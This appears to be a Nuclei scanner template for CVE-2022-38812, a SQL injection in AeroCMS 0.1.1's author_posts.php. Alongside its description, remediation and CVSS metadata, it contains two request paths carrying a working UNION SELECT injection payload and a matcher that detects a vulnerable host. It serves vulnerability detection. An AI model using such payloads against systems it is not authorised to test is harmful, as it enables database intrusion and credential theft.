id: CVE-2022-38812 info: name: AeroCMS 0.1.1 - SQL Injection author: shivampand3y severity: medium description: | AeroCMS 0.1.1 contains a SQL injection caused by unsanitized author parameter, letting attackers execute arbitrary SQL commands, exploit requires crafted author input. impact: | Authenticated attackers can exploit SQL injection in the author parameter to extract sensitive database information including user credentials, content data, and application configuration from the AeroCMS database. remediation: | Update AeroCMS to a version newer than 0.1.1 that properly sanitizes the author parameter and uses parameterized queries. reference: - https://www.exploit-db.com/exploits/51022 - https://www.nu11secur1ty.com/2022/08/aerocms-v001-sqli.html - https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/MegaTKC/2021/AeroCMS-v0.0.1-SQLi - https://nvd.nist.gov/vuln/detail/CVE-2022-38812 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2022-38812 cwe-id: CWE-89 epss-score: 0.02103 epss-percentile: 0.79263 metadata: verified: true max-request: 2 vendor: aerocms_project product: aerocms tags: cve,cve2022,aero,cms,sqli,edb,vuln variables: num: "999999999" http: - method: GET path: - '{{BaseURL}}/author_posts.php?author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}}),1,1),NULL,NULL,NULL,NULL--%20-&p_id=1' - '{{BaseURL}}/cms/author_posts.php?author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}}),1,1),NULL,NULL,NULL,NULL--%20-&p_id=1' stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - '{{md5(num)}}' - type: status status: - 200 # digest: 4a0a00473045022100e4b87375abbfde4eae100a010cc96762d34c299681e7880c552005c59f181ca802201ce68aaeadb534689a73f49d8b66d6423318644a92937a1956f68d5449d119cc:922c64590222798bb761d5b6d8e72950